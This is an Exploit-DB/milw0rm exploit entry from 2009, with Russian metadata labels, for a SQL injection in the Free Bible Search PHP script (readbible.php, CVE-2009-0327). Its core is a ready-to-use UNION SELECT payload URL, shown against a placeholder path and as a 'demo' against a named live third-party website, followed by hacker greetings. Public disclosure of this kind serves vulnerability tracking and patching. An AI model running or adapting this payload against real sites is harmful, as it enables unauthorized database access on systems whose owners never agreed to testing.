Exploit Free Bible Search PHP Script - SQL Injection

[Exploiter]

EDB-ID

7798

Проверка EDB

1. Пройдено

Автор

NUCLEAR

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2009-0327

Дата публикации

2009-01-15

#Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability


#Author: nuclear


#site:
http://www.seraphimtech.net/?q=node/6


#vuln:
http://localhost/[path]/readbible.php?version=kjv%20union%20select%20@@version--

#demo:
http://www.lordblessthee.com/bible/readbible.php?version=kjv%20union%20select%20@@version--

#greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar 

# milw0rm.com [2009-01-15]